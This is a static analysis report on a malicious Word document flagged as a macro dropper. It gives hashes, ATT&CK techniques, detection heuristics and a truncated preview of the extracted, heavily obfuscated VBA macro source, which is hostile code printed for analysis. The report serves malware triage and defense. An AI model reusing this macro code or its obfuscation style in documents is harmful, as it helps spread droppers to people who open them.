Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ff4ddf4aa1f9b0e9…

MALICIOUS

Office (OLE)

Size: 227.5 KB
Created: 2018-03-05 15:05:00
Authoring application: Microsoft Office Word
First seen: 2019-02-10
MD5: 17ea41af6c2095763c515907d9891157
SHA-1: 2b03342c61480686b0c1ff1887eceba81d6e40ca
SHA-256: ff4ddf4aa1f9b0e93830e1ff93a1a8ad3a5bccd9adc33730d1d5eda3a5b604b0
Risk Score: 224

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment
  • T1071.001 Application Layer Protocol: Web Protocols

The sample is a malicious OLE document containing a VBA macro. The macro uses obfuscation techniques and calls `CreateObject`, indicating an attempt to execute arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6464748-0' and the presence of a VBA macro with auto-execution markers strongly suggest this file acts as a dropper for a second-stage payload. The embedded URL, though benign, is noted as part of the document's structure.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6464748-0 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-6464748-0
  • VBA macros detected [medium, 3 related findings] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro [high] (OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call [high] (OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] (OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 71436 bytes
SHA-256: fbe96e6fda26a2c10d8c90748dde6c09e2c1481eab4c71bf39ed4b87051d32a8
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 30 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "hkbaQLDn"
Function jiNIhShjPkG()
On Error Resume Next
mwjCbtwk = "RzSqwVKNzsXO=%mlPfufUwaOWomYfKokCjAqs"
SAULfRajnf = 8698450 / Atn(ilFivlB) / (9071374 - pIVQtlIoUoJ / 1522383 - Sqr(zLIQzfc * CStr(lOioUzSmfpizr / Sgn(7731342 - CDate(6301401 / XswEXT * 7800293 * Sqr(GPouZimWSqD))))) + (ncYoqCozfKXJi - 367897 / 8633859 / CLng(1237584)))
PjGUvDzXwjc = 6260530 / Atn(USawhFIXM) / (200044 - IfAkn / 3648960 - Sqr(UKOVipEwsfQXlf * CStr(uVkSpuTfSqnw / Sgn(4305224 - CDate(6032910 / YqizmWKzn * 7143320 * Sqr(lMdHoPXTkfzUd))))) + (Aivfr - 8577873 / 6536129 / CLng(3252000)))
jfmOh = niBSoLO + dd333h3sd(mwjCbtwk, 17, 11)
NQMPicDXr = "MllvfYTLETPnkEL=%QrioljYipnwTXzbWcpjD"
sFTonDD = 8032009 / Atn(QhVZfGBzzD) / (5938962 - IcVXbcwLUNoQKs / 2254872 - Sqr(PBpDozlPa * CStr(OaUlWzMSUO / Sgn(1496989 - CDate(446842 / VPiJCt * 960978 * Sqr(nvdiwNb))))) + (KqFwwO - 4208004 / 8171216 / CLng(6843680)))
zSvuQ = 8134071 / Atn(EsXzPNvUnKni) / (4373804 - OafqCYlkJ / 1910716 - Sqr(CFGGtoaME * CStr(XPzNU / Sgn(467533 - CDate(8755990 / wWHibknqzjRC * 3782941 * Sqr(NZNHpNuWNWS))))) + (qKhciWsw - 2092276 / 7517983 / CLng(3142789)))
coNmlsmHjX = GZootSjWz + dd333h3sd(NQMPicDXr, 12, 13)
naqMSaipG = "QWWzjGilJGmiUp% tes&&s=%4raoP"
ToTKAboodv = 8173427 / Atn(qEwQYc) / (4861172 - ljtWmNaBno / 3938010 - Sqr(DkVvX * CStr(LtrbflQb / Sgn(845423 - CDate(6388749 / iQiapG * 7803547 * Sqr(YrZXR))))) + (IJmEF - 6758462 / 34808 / CLng(8548203)))
sjlwsPnW = 1484672 / Atn(fmJAIFLJ) / (8760708 - JXmdNijqzamWZa / 4442285 - Sqr(dXwwFmIRuD * CStr(nwSjPdVrkXJqbC / Sgn(1776904 - CDate(8632985 / iJMidhcoKvp * 4512471 * Sqr(UiJjsuh))))) + (WsEimETjXvwtb - 7592621 / 7066682 / CLng(8373509)))
MrQuiBnf = dWTDotuB + dd333h3sd(naqMSaipG, 3, 15)
MTzvsvvfKv = "LEuFwjhtzdUZLVioMlwjOtNioakdat!!%8ravPjjRW"
PusRNiRu = 2986253 / Atn(MRzclYjjNjAKz) / (2794783 - qMzis / 1898168 - Sqr(bIUbthT * CStr(jaLoGTqfwLruEZ / Sgn(1849855 - CDate(580923 / iwKRjXW * 6972960 * Sqr(qrHKfBNOCZzKIh))))) + (hASBO - 1710896 / 472647 / CLng(9713505)))
cULUr = 3336551 / Atn(LiIhzCo) / (867765 - dwXojp / 6516327 - Sqr(WjDCZQKkjEVVq * CStr(sqvUTEjFXKFB / Sgn(857092 - CDate(302235 / MmMhSj * 2858458 * Sqr(MlSwwOz))))) + (jPpFhsMW - 5702331 / 1784564 / CLng(3107579)))
SSHhjv = KOprFif + dd333h3sd(MTzvsvvfKv, 6, 7)
plfFcR = "jtujWHwPzSm%!!%5rav%!!%4raLhpFqfLDlGShYpJqjADWKdv"
TDJhitolHNI = 3840665 / Atn(krPSqaIcYom) / (8218442 - dqAwpG / 5054572 - Sqr(LXsVwt * CStr(tZsvzFiz / Sgn(2268247 - CDate(7921091 / vmnpMIpSPp * 3739773 * Sqr(UqtXYUXzsh))))) + (jwwqrEzroHMKn - 3798838 / 4346216 / CLng(2205856)))
iNVhYYZi = 6858019 / Atn(jdbZzXFGhFi) / (7724171 - lOvEqPRwNQziU / 1530406 - Sqr(GEBInRLEQJA * CStr(llWtMAPbw / Sgn(8468504 - CDate(2867273 / vSjSMdvdPZz * 5662100 * Sqr(WAaZK))))) + (vpqfNrWliE - 6185507 / 6705594 / CLng(2743921)))
tnPzblOzFaG = twYMIaW + dd333h3sd(plfFcR, 24, 15)
LzJOVNPAb = "AmtXFcWziFaniiXLljDmWeh=%5rav% tes&&YwKHDj"
wqibwFZUfbt = 2475192 / Atn(OGdfkH) / (7215672 - corzLnUa / 2993092 - Sqr(DhbiJAZBCQTN * CStr(jkdvzQEhvOcu / Sgn(4740479 - CDate(5286591 / ZhmXNFWfjkwdGj * 990650 * Sqr(wODHNhrVK))))) + (FHSzjlY - 5089168 / 5405907 / CLng(4080540)))
zaImZjQo = 5733435 / Atn(AfMFzLDmzzqtdj) / (4025598 - lrpRNCAO / 2399308 - Sqr(ALEjHjrDNYu * CStr(jjSXNH / Sgn(3336933 - CDate(4913044 / DQFpkfMhw * 5941603 * Sqr(sPKsiRqGBZSwYd))))) + (Izppsz - 7486263 / 2228676 / CLng(9446769)))
GtMTE = VNVltrnOWJLl + dd333h3sd(LzJOVNPAb, 4, 18)
IiHmduJoSz = "JEzHPfqPqlVZRDJRobWtj=%2rav% tes&&p=%zpoqXtzhppPfEXO"
iOCjZTPB = 5089139 / Atn(vjEYiwsZdiOXcJ) / (3026206 - FwdkqwhSbGF / 8515854 - Sqr(YmvRmWXtQ * CStr(rApjjc / Sgn(3303393 - CDate(4871316 / zOSYbpF * 9697745 * Sqr(lzXrAAFrSFpnsm))))) + (rmkBQwqJhstJ - 1124595 / 2764127 / CLng(3775746)))
SEjzH = 5373908 / Atn(XZIThAzpbsJ) / (2159368 - ZHcdhp
... (truncated)